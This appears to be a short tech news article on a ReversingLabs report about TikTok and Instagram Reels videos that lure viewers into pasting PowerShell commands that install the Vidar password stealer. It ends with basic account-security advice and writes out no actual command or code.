- TikTok and Instagram Reels are now used to target victims
- “Free” subscriptions to Spotify, Microsoft and Adobe targeting cash-strapped users
- Social engineering remains the main vector, but basic account security measures do the heavy lifting
A new report from ReversingLabs warns doomscrollers about videos spreading on short-form platforms like TikTok and Instagram Reels, infecting users with password-stealing malware.
The videos usually promise free access to subscriptions like Spotify Premium, Windows, Office and Adobe – an instant, tell-tale sign that things may not be what they seem.
Instead of receiving phishing emails, victims are asked to open command line tools like PowerShell, then paste and run the command shown in the video.
Beware of this information stealing malware
When they run the command, it triggers the download and installation of malware on a victim’s computer. Vidar, the information stealer, targets usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal files and documents, and other sensitive information.
But more importantly, it marks a significant change: Previously, email phishing campaigns were extremely popular for accessing victims’ credentials, with just a click of a link leading to potential disaster. This newer method relies on victims physically entering commands into a tool, which requires more patience.
Ultimately, the attack exploits current economic tensions and the fact that consumers are looking for cheap and free alternatives to popular subscriptions.
“This type of social engineering is an easy way for malicious actors to divert social media traffic to a malicious website controlled by the attacker,” the researchers wrote.
Regardless, the overall theme is that social engineering remains the clearest way for attackers to reach their victims, and that’s good news because there are many basic principles that potential victims can follow, such as using multi-factor authentication to secure accounts.
Being wary of suspiciously cheap or free products/services and only downloading software from official providers would also help in this case.
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds.
